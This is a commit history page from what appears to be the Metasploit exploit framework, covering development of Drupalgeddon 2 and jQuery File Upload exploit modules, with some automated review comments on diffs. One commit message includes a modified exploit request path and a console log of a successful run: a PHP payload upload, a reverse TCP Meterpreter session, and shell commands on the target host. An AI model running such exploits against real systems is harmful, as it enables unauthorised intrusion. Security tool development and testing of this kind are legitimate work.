Commit Graph

1001 Commits

Author SHA1 Message Date
Brendan Coles 24f807490f revisionism 2019-01-10 19:19:14 +00:00
William Vu 90b9204703 Update DisclosureDate to ISO 8601 in my modules
Basic msftidy fixer:

diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb
index 9a21b9e398..e9ff2b21e5 100755
--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -442,6 +442,8 @@ class Msftidy
     # Check disclosure date format
     if @source =~ /["']DisclosureDate["'].*\=\>[\x0d\x20]*['\"](.+?)['\"]/
       d = $1  #Captured date
+      File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))
+      fixed('Probably updated traditional DisclosureDate to ISO 8601')
       # Flag if overall format is wrong
       if d =~ /^... (?:\d{1,2},? )?\d{4}$/
         # Flag if month format is wrong
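Review bot: the added `File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))` runs unconditionally as soon as the DisclosureDate regex matches, so a module whose date is already ISO 8601 is rewritten on every msftidy run and reported as "Probably updated", and the format checks that follow still inspect the old `d` rather than the corrected value. Guard the write with a comparison (`iso = Date.parse(d).to_s; if iso != d ... end`) and rescue `ArgumentError` from `Date.parse`, which raises on an unparseable date before the existing format warnings below get a chance to report it. Note also that `@source.sub(d, ...)` with a String pattern replaces the first literal occurrence of that text anywhere in the file, not specifically the DisclosureDate line.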
2018-11-16 12:18:28 -06:00
William Vu 67f2933b58 Make fewer assumptions about Apache
Returning CheckCode::Safe is too aggressive for a supplemental check.
Admins can change the directive in top-level configuration, anyway.
2018-10-23 16:26:17 -05:00
William Vu bdf2d44415 Augment check with Apache Server header 2018-10-23 07:04:14 -05:00
William Vu 0249f1a4af Improve check method and refactor 2018-10-23 06:20:31 -05:00
William Vu 3d06c10ad0 Link to Apache AllowOverride directive and change 2018-10-23 03:51:16 -05:00
William Vu c9673df3b8 Add WordPress Work The Flow File Upload links
As noted by @bcoles, we have a module exploiting this vuln in #5130,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.

msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
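Review bot: replacing `normalize_uri(wordpress_url_plugins, ...)` with the literal `'/jQuery-File-Upload/server/php/index.php'` drops both the configured target URI and normalize_uri's path handling, so this version of the module only works when the asset is mounted at the web root. That is fine for the one-off demonstration in this commit message that the bundled asset, not the plugin, is the vulnerable component, but if such a change were ever committed it should go through `normalize_uri(target_uri.path, 'server', 'php', 'index.php')` so that installs under a sub-path remain reachable.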
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
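Review bot: `"/jQuery-File-Upload/server/php/files/#{php_pagename}"` interpolates the uploaded file name straight into a hard-coded path with no normalize_uri, so the second request is tied to a root-mounted install and to a well-formed `php_pagename`; routing it through `normalize_uri(target_uri.path, 'server', 'php', 'files', php_pagename)` keeps the base path configurable and the resulting URI normalised, matching how the surrounding module builds its other requests.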
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Welp.
2018-10-23 03:51:11 -05:00
William Vu a55f7ff30a Clarify vuln (re)discovery vs. disclosure
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
2018-10-23 03:22:45 -05:00
William Vu b4bdc52597 Sort path list by frequency 2018-10-22 23:35:42 -05:00
William Vu dbc0c802d5 Add detection of additional paths 2018-10-22 23:35:42 -05:00
William Vu c4f8b6c937 Add rudimentary check method 2018-10-22 23:35:42 -05:00
William Vu dba7e35819 Refactor slightly with methods
And also check upload response.
2018-10-22 23:35:42 -05:00
William Vu e7ada1a40c Add timeout on payload request
This ensures we don't block on execution.
2018-10-22 23:35:42 -05:00
William Vu 15f14bb295 Add note about Apache .htaccess 2018-10-22 23:35:42 -05:00
William Vu a986a17bb0 Link to @lcashdol's PoC 2018-10-22 23:35:42 -05:00
William Vu 37dbdbf58f Update project URL to PR 2018-10-22 23:35:42 -05:00
William Vu 41721c31fb Add blueimp's jQuery (Arbitrary) File Upload 2018-10-22 23:35:42 -05:00
William Vu 7bc98e0ea8 Fix formatting and convert a missed AKA reference 2018-10-05 03:22:08 -05:00
Rob 6f5a8f8f42 Fix outdated metadata 2018-10-01 18:59:09 +01:00
Erin Bleiweiss eb17d9b198 Refactor AKA references for modules 2018-08-31 16:56:05 -05:00
Wei Chen b899839c53 Oops I made boo-boos 2018-08-21 08:53:43 -05:00
Wei Chen 01ad152067 Update false negatives on post auth information 2018-08-20 16:05:58 -05:00
Wei Chen 3d0d8f7773 Update false negatives on post auth information 2018-08-20 15:43:07 -05:00
asoto-r7 1a3a4ef5e4 Revised 88 aux and exploit modules to add CVEs / references 2018-07-12 17:34:52 -05:00
Wei Chen 5fc5a47cd2 Update CVE references for exploit modules
These are based on cross references by EDB, OSVDB, module short
name, blog post and BID.
2018-07-08 18:46:04 -05:00
William Vu 88f09dc302 Update a few stragglers in Drupalgeddon 2
1. I added a missed header and YARD to the Drupal mixin.
2. I decided to match discovered versions more liberally.
2018-05-03 18:35:25 -05:00
William Vu 728d7bc065 Fix #9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
2018-05-03 17:38:32 -05:00
William Vu 873cbcee27 Fix #9876, minor updates to Drupalgeddon 2
1. Tested versions are already listed in the module doc, and we've
tested more than just 7.57 and 8.4.5 now. Removing a source of potential
inconsistency in the future.
2. No problem with ivars anymore. No idea what happened, but maybe I was
just too tired to code. Removing cleanup method.
2018-04-25 18:09:54 -05:00
William Vu b8eb7f2a86 Set target type instead of regexing names
We're no longer matching multiple targets like /In-Memory/ or /Dropper/,
so it makes sense to match on a specific value now.

Old matching in this commit: 1900aa2708.
2018-04-25 11:53:26 -05:00
William Vu 910e9337fb Use print_good for patch level check, oops 2018-04-24 23:21:22 -05:00
William Vu b7ac16038b Correct comment about PHP CLI (it's not our last!) 2018-04-24 23:18:51 -05:00
William Vu ec43801564 Add check for patch level in CHANGELOG.txt
Looks like 8.x has core/CHANGELOG.txt instead.
2018-04-24 23:12:33 -05:00
William Vu 2ff0e597a0 Add SA-CORE-2018-002 as an AKA ref
Makes sense to me. Even though it's technically the advisory.
2018-04-24 22:51:33 -05:00
William Vu 8bc1417c8c Use PHP_FUNC as a fallback in case assert() fails
Additionally drop a file in a writable directory in case CWD fails.
2018-04-24 22:29:27 -05:00
William Vu 8ff4407ca6 Clarify version detection error message
This was supposed to imply that we couldn't configure the exploit for a
targetable version. Instead, it just read weirdly. I think it was
missing "to target" at the end. "Determine" is a much better word,
though, since we may be doing detection instead of mere configuration.
2018-04-24 20:51:51 -05:00
William Vu cfaca5baa3 Restore a return lost in the refactor :(
Also spiff up comments.
2018-04-24 11:25:55 -05:00
William Vu b507391f1b Change back to vprint_status for the nth time
I really couldn't decide, especially once I got rid of CmdStager.

Also fully document the module options.
2018-04-24 04:23:52 -05:00
William Vu c8b6482ab0 Rewrite PHP targets to work with 7.x and 8.x
Win some, lose some. php -r spawns a new (obvious) command. :/

Check method and version detection also rewritten. :)
2018-04-24 03:38:05 -05:00
William Vu 8be58d315c Stop being lazy about badchar analysis
Badchars apply to all targets.
2018-04-20 19:30:38 -05:00
William Vu fcfe927b7a Add PHP dropper functionality and targets 2018-04-19 05:11:21 -05:00
William Vu 62aca93d8b Cache version detection and print only once
Oops. This is the problem with overloading methods.
2018-04-19 04:59:07 -05:00
William Vu 2670d06f99 Add in-memory PHP execution using assert() 2018-04-19 02:18:56 -05:00
William Vu 7a2cc991ff Refactor once more with feeling
Nested conditionals are the devil. Printing should be consistent now.
2018-04-18 23:59:14 -05:00
William Vu 3d116d721d Add version detection and automatic targeting
I also refactored error handling. Should be cleaner now.
2018-04-18 21:40:22 -05:00
William Vu 86ffbc753e Refactor clean URL handling and remove dead code 2018-04-18 19:56:42 -05:00
William Vu 1900aa2708 Refactor module and address review comments 2018-04-17 19:05:45 -05:00
William Vu d8508b8d7d Add Drupal Drupalgeddon 2 2018-04-14 00:22:30 -05:00
Jacob Robles 0fa63ae7b3 Update documentation and module
Included Super User in the documentation.
Implemented changes h00die suggested.
Modified sqli to generate strings used in regex.
2018-03-28 10:57:28 -05:00
Luis Hernandez dddad415a5 add Msf::Exploit::Remote::HTTP::Joomla 2018-03-11 07:59:26 -05:00
Luis Hernandez 37bf4d118a Changes suggested by h00die 0803 2018-03-09 09:55:50 -05:00